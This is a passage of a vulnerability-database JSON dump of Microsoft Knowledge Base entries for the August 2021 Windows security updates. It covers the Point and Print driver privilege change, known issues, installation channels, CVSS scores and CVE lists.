licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, Microsoft strongly recommends that you install the latest SSU ([KB5004378](<https://support.microsoft.com/help/5004378>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5005036](<https://support.microsoft.com/help/5005036>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005089>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Embedded Standard 7 Service Pack 1, Windows Embedded POSReady 7, Windows Thin PC**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005089](<https://download.microsoft.com/download/d/0/4/d0487f5c-6448-4a25-badb-8fcab6fc55bf/5005089.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T07:00:00", "type": "mskb", "title": "August 10, 2021\u2014KB5005089 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-36937", "CVE-2021-36942"], "modified": "2021-08-10T07:00:00", "id": "KB5005089", "href": "https://support.microsoft.com/en-us/help/5005089", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:18", "description": "None\n**12/8/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 1507 update history home page.\n\n## Highlights\n\n * Updates the default installation privilege requirement so that you must be an administrator to install drivers when using [Point and Print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>). \n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Changes the default privilege requirement for installing drivers when using Point and Print. After installing this update, you must have administrative privileges to install drivers. If you use Point and Print, see [KB5005652](<https://support.microsoft.com/topic/873642bf-2634-49c5-a23b-6d8e9a302872>), [Point and Print Default Behavior Change](<https://aka.ms/PointPrintMSRCBlog>), and [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) for more information.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update, the Encrypted File System (EFS) API [OpenEncryptedFileRaw(A/W)](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>), often used in backup software, will not work when you back up to or from a Windows Server 2008 SP2 device. OpenEncryptedFileRaw will continue to work on all other versions of Windows (local and remote).| This behavior is expected because we addressed the issue in CVE-2021-36942.**Note** If you cannot use backup software on Windows 7 SP1 and Server 2008 R2 SP1 or later after installing this update, contact the manufacturer of your backup software for updates and support. \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions. If you are using Windows Update, the latest SSU (KB5001399) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005040>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5005040](<https://download.microsoft.com/download/5/2/5/5258a9c1-9a52-4572-820f-3cf7336f0291/5005040.csv>). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T07:00:00", "type": "mskb", "title": "August 10, 2021\u2014KB5005040 (OS Build 10240.19022)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-36938", "CVE-2021-36942"], "modified": "2021-08-10T07:00:00", "id": "KB5005040", "href": "https://support.microsoft.com/en-us/help/5005040", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:20", "description": "None\n**Important: **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the device. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**Important: **Windows Server 2012 has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional releases (known as \"C\" or \"D\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2012 update history [home page](<https://support.microsoft.com/help/4009471>).\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * Changes the default privilege requirement for installing drivers when using Point and Print. After installing this update, you must have administrative privileges to install drivers. If you use Point and Print, see [KB5005652](<https://support.microsoft.com/topic/873642bf-2634-49c5-a23b-6d8e9a302872>), [Point and Print Default Behavior Change](<https://aka.ms/PointPrintMSRCBlog>), and [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) for more information.\n * Addresses an issue in which Smart Card Authentication (PIV) fails on non-RFC compliant printers and scanners requiring smartcard authentication. For more information, see [KB5005389](<https://support.microsoft.com/help/5005389>).\n * This update also contains miscellaneous security improvements to internal OS functionality.\nFor more information about the resolved security vulnerabilities, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update, the Encrypted File System (EFS) API **[OpenEncryptedFileRaw(A/W)](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>)**, often used in backup software, will not work when you back up to or from a Windows Server 2008 SP2 device. **OpenEncryptedFileRaw** will continue to work on all other versions of Windows (local and remote).| This behavior is expected because we addressed the issue in [CVE-2021-36942](<https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2021-36942>).**Note** If you cannot use backup software on Windows 7 SP1 and Server 2008 R2 SP1 or later after installing this update, contact the manufacturer of your backup software for updates and support. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001401](<https://support.microsoft.com/help/5001401>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5005036](<https://support.microsoft.com/help/5005036>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KBNNNNNNN>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2012, Windows Embedded 8 Standard**Classification**: Security Update \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005094](<https://download.microsoft.com/download/4/d/f/4dfb503a-e6e6-464c-a027-c7cfe76e0792/5005094.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T07:00:00", "type": "mskb", "title": "August 10, 2021\u2014KB5005094 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-36937", "CVE-2021-36942"], "modified": "2021-08-10T07:00:00", "id": "KB5005094", "href": "https://support.microsoft.com/en-us/help/5005094", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:19", "description": "None\n**Important: **Windows 7 and Windows Server 2008 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 7 and Windows Server 2008 R2 update history [home page](<https://support.microsoft.com/help/4009469>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5004289](<https://support.microsoft.com/help/5004289>) (released July 13, 2021) and addresses the following issues:\n\n * Changes the default privilege requirement for installing drivers when using Point and Print. After installing this update, you must have administrative privileges to install drivers. If you use Point and Print, see [KB5005652](<https://support.microsoft.com/topic/873642bf-2634-49c5-a23b-6d8e9a302872>), [Point and Print Default Behavior Change](<https://aka.ms/PointPrintMSRCBlog>), and [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) for more information.\n * Addresses an issue in which Smart Card Authentication (PIV) fails on non-RFC compliant printers and scanners requiring smartcard authentication. For more information, see [KB5005392](<https://support.microsoft.com/help/5005392>).\n * This update also contains miscellaneous security improvements to internal OS functionality.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**How to get this update****Symptom **| **Workaround ** \n---|--- \nAfter installing this update, the Encrypted File System (EFS) API **[OpenEncryptedFileRaw(A/W)](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>)**, often used in backup software, will not work when you back up to or from a Windows Server 2008 SP2 device. **OpenEncryptedFileRaw** will continue to work on all other versions of Windows (local and remote).| This behavior is expected because we addressed the issue in [CVE-2021-36942](<https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2021-36942>).**Note** If you cannot use backup software on Windows 7 SP1 and Server 2008 R2 SP1 or later after installing this update, contact the manufacturer of your backup software for updates and support. \nAfter installing this update and restarting your device, you might receive the error, \"Failure to configure Windows updates. Reverting Changes. Do not turn off your computer\", and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/obtaining-extended-security-updates-for-eligible-windows-devices/ba-p/1167091>) post. For information on the prerequisites, see the **How to get this update** section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \"STATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\". This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following: \n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n**Before installing this update****IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n\n * For Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Note** For Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services.**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The March 12, 2019 servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released September 10, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. For Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.\n 4. To get this security update, you must reinstall the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)) even if you previously installed the ESU key. The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter you install the items above, we strongly recommend that you install the latest SSU ([KB5004378](<https://support.microsoft.com/help/5004378>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005088>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Embedded Standard 7 Service Pack 1, Windows Embedded POSReady 7, Windows Thin PC**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005088](<https://download.microsoft.com/download/5/1/c/51cfa686-f644-4875-b76b-610d21809361/5005088.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T07:00:00", "type": "mskb", "title": "August 10, 2021\u2014KB5005088 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-36937", "CVE-2021-36942"], "modified": "2021-08-10T07:00:00", "id": "KB5005088", "href": "https://support.microsoft.com/en-us/help/5005088", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:19", "description": "None\n**7/13/21 \nIMPORTANT **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the machine. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>). \n\n**11/19/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 1607 update history home page. \n\n## Highlights\n\n * Updates an issue that renders some Yu Gothic and Yu Mincho characters incorrectly in vertical writing mode. \n * Updates an issue with zoom that occurs when you use Microsoft Edge IE Mode on devices that use multiple high-DPI monitors.\n * Updates the default installation privilege requirement so that you must be an administrator to install drivers when using [Point and Print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>). \n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an issue that renders some Yu Gothic and Yu Mincho characters incorrectly in vertical writing mode.\n * Addresses an issue with zoom that occurs when using Microsoft Edge IE Mode on devices that use multiple high-DPI monitors.\n * Addresses an issue that causes Windows to stop working when it uses AppLocker to validate a file that has multiple signatures. The error is 0x3B.\n * Changes the default privilege requirement for installing drivers when using Point and Print. After installing this update, you must have administrative privileges to install drivers. If you use Point and Print, see [KB5005652](<https://support.microsoft.com/topic/873642bf-2634-49c5-a23b-6d8e9a302872>), [Point and Print Default Behavior Change](<https://aka.ms/PointPrintMSRCBlog>), and [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) for more information.\n * Addresses an issue with Administrative Template settings you configure using a Group Policy Object (GPO). When you change the value of the policy settings to NOT CONFIGURED, the system continues to apply the previous settings instead of removing them. This issue occurs after installing the June 2020 or later updates and is most noticeable with roaming user profiles.\n * Addresses an issue in which an extra dereference against a sign in session causes **lsass.exe** to stop working after the user signs out.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n### \n\n__\n\nClick or tap to view the known issues\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update, the Encrypted File System (EFS) API [OpenEncryptedFileRaw(A/W)](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>), often used in backup software, will not work when you back up to or from a Windows Server 2008 SP2 device. OpenEncryptedFileRaw will continue to work on all other versions of Windows (local and remote).| This behavior is expected because we addressed the issue in CVE-2021-36942.**Note** If you cannot use backup software on Windows 7 SP1 and Server 2008 R2 SP1 or later after installing this update, contact the manufacturer of your backup software for updates and support. \nAfter installing updates released April 22, 2021 or later, an issue occurs that affects versions of Windows Server that are in use as a Key Management Services (KMS) host. Client devices running Windows 10 Enterprise LTSC 2019 and Windows 10 Enterprise LTSC 2016 might fail to activate. This issue only occurs when using a new Customer Support Volume License Key (CSVLK). **Note** This does not affect activation of any other version or edition of Windows. Client devices that are attempting to activate and are affected by this issue might receive the error, \"Error: 0xC004F074. The Software Licensing Service reported that the computer could not be activated. No Key Management Service (KMS) could be contacted. Please see the Application Event Log for additional information.\"Event Log entries related to activation are another way to tell that you might be affected by this issue. Open **Event Viewer **on the client device that failed activation and go to **Windows Logs **> **Application**. If you see only event ID 12288 without a corresponding event ID 12289, this means one of the following:\n\n * The KMS client could not reach the KMS host.\n * The KMS host did not respond.\n * The client did not receive the response.\nFor more information on these event IDs, see [Useful KMS client events - Event ID 12288 and Event ID 12289](<https://docs.microsoft.com/windows-server/get-started/activation-troubleshoot-kms-general#event-id-12288-and-event-id-12289>).| This issue is resolved in KB5010359. \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB5001402) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005043>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5005043](<https://download.microsoft.com/download/c/8/4/c84ac030-6839-4436-9f81-8090e3f21e79/5005043.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T07:00:00", "type": "mskb", "title": "August 10, 2021\u2014KB5005043 (OS Build 14393.4583)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-36938", "CVE-2021-36942"], "modified": "2021-08-10T07:00:00", "id": "KB5005043", "href": "https://support.microsoft.com/en-us/help/5005043", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:21", "description": "None\n**Important: **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the device. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**Important: **Windows Server 2012 has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional releases (known as \"C\" or \"D\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2012 update history [home page](<https://support.microsoft.com/help/4009471>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5004294](<https://support.microsoft.com/help/5004294>) (released previous July 13, 2021) and addresses the following issues:\n\n * Changes the default privilege requirement for installing drivers when using Point and Print. After installing this update, you must have administrative privileges to install drivers. If you use Point and Print, see [KB5005652](<https://support.microsoft.com/topic/873642bf-2634-49c5-a23b-6d8e9a302872>), [Point and Print Default Behavior Change](<https://aka.ms/PointPrintMSRCBlog>), and [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) for more information.\n * Addresses an issue in which Smart Card Authentication (PIV) fails on non-RFC compliant printers and scanners requiring smartcard authentication. For more information, see [KB5005389.](<https://support.microsoft.com/help/5005389>)\n * This update also contains miscellaneous security improvements to internal OS functionality.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update 